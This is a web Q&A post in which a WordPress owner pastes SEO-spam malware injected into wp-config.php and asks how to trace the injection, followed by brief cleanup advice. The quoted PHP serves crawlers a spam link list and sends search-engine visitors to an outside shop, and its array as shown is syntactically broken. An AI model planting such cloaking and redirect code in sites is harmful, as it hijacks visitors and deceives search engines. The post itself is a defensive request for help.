# How to track down a header redirect being injected into wp-config.php

Tags: php, wordpress, security, malware, virus

I have the code being injected into one of my sites. I can't find the culprit. I downloaded the site with BackupBuddy, and it showed the injected code, which is the following:

```
<?php

$referer = $_SERVER['HTTP_REFERER'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];

$tmp = strtolower($_SERVER['HTTP_USER_AGENT']);

if (strpos($tmp, 'google') !== false || strpos($tmp, 'yahoo') !== false || strpos($tmp, 'bing') !== false ||

  strpos($tmp, 'aol') !== false || strpos($tmp, 'sqworm') !== false || strpos($tmp, 'bot') !== false) {

  cheongsam dress => "http://www.cozyladywear.com/qipao-cheongsam-c-87.html",
  cheongsam dresses => "http://www.goodorient.com/Dresses_C115",
  cheongsam style dress => "https://www.pinterest.com/explore/cheongsam-modern/",
  cheongsam dress pattern => "http://www.japanesesewingbooks.com/2014/01/13/free-girls-qi-pao-chinese-dress-pattern-and-sew-along/",
  dress cheongsam => "http://www.japanesesewingbooks.com/2014/01/13/free-girls-qi-pao-chinese-dress-pattern-and-sew-along/",
  cheongsam dresses for sale => "http://modernqipao.com/",
  red cheongsam dress => "http://redchinesedress.com/product-category/cheongsam-qipao/",
  black cheongsam dress => "https://www.etsy.com/market/black_cheongsam",
  cheongsam evening dress => "http://yannyexpress.com/collections/wedding-qipao-cheongsam",
  cheongsam dress for sale => "http://www.dresswe.com/cheongsam-dresses-103948/",
  short cheongsam dresses => "http://www.elegente.com/short-cheongsam",
  cheongsam inspired dresses => "https://www.pinterest.com/friedwontons4u/the-modern-girls-guide-to-cheongsamqipao/",
  lace cheongsam dress => "http://modernqipao.com/product-category/material/lace/",
  silk cheongsam dress => "http://www.efushop.com/index.php/goods/category/Silk-Brocade-cheongsam",
  vintage cheongsam dress => "https://www.etsy.com/market/vintage_cheongsam",
  blue cheongsam dress => "http://modernqipao.com/product-tag/blue/",
  purple cheongsam dress => "http://modernqipao.com/product-tag/purple-lavender-color/",
  white cheongsam dress => "https://www.pinterest.com/explore/cheongsam-wedding/",
  cotton cheongsam dress => "http://www.efushop.com/index.php/goods/category/Cotton-cheongsam",
  cheongsam dress sewing pattern => "http://vintagepatterns.wikia.com/wiki/Category:Cheongsam",
  cheongsam prom dress => "http://www.cozyladywear.com/fuchsia-fishtail-cheongsam-qipao-chinese-wedding-prom-dress-p-611.html",
  cheongsam inspired dress => "https://www.etsy.com/market/qipao",
  gold cheongsam dress => "http://modernqipao.com/product/gold-circled-lace-modern-mini-qipao-sexy-chinese-cheongsam-dress/",
  cheongsam dinner dress => "https://www.pinterest.com/yannyexpress/wedding-qipao-cheongsam-bridal-kwa-qun-couture-eve/",
  cheongsam bridesmaid dresses => "https://www.pinterest.com/explore/chinese-wedding-dresses/",
  pink cheongsam dress => "http://modernqipao.com/product-tag/pink-peach-champagne/",
  cheongsam short dress => "https://www.pinterest.com/cozyladywear/qipao-cheongsam/",
  hot cheongsam dress => "http://www.idreammart.com/chinese-dresses/2015-hot-cheongsam-chinese-dresses.html",
  cheongsam dresses uk => "http://www.kaiizhang.co.uk/",
  chinese traditional dress => "https://en.wikipedia.org/wiki/Chinese_clothing",
  traditional chinese dress => "http://www.travelchinaguide.com/intro/clothing/",
  traditional chinese dresses => "http://www.chinatoday.com/culture/qipao/qipao.htm",
  chinese dress traditional => "https://en.wikipedia.org/wiki/Cheongsam",
  );
  exit;
}
//
$from_search_engine = false;
$jump_referer = array('google','bing','yahoo','msn','ask','yandex','aol');
foreach($jump_referer as $ref){
  $ref_rst = stripos($referer,$ref);
  if($ref_rst > -1){
    $from_search_engine=true;
    break;
  }
}

if($from_search_engine){
  header("Location: http://www.acc2buy.com/");
  exit;
}
?>
```

This code is at the very top of wp-config.php - however, when I login via FTP, this code isn't there. So it's redirecting all users that try to come via a search engine.

How would I go about tracking down the actual injection file? I've already GREPped everything, looking for any references to wp-config.php.

I have also started with index.php, and worked my way through wp-blog-head.php and wp-load.php - I can't seem to find where it's being prepended.

Thanks in advance guys!

Comment: probably you have some security vulnerability in one of your WP plugins, or WP itself (if it's old version). You have to remove the "hack", and to watch access log and error log in Apache, to understand where is the vulnerability. Sounds like someone found the way to exploit your site, and they will keep doing this, until you'll fix the breach

Answer (score 0):

I have checked your issue, Do one thing just zipped this file as backup and delete the existing file after changing the host,username and password

some times the code is not shown while viewing the code in cpanel so best way is to upload new file after changes and delete old one

Hope you get the solution 
feel free to ask any malware related query :)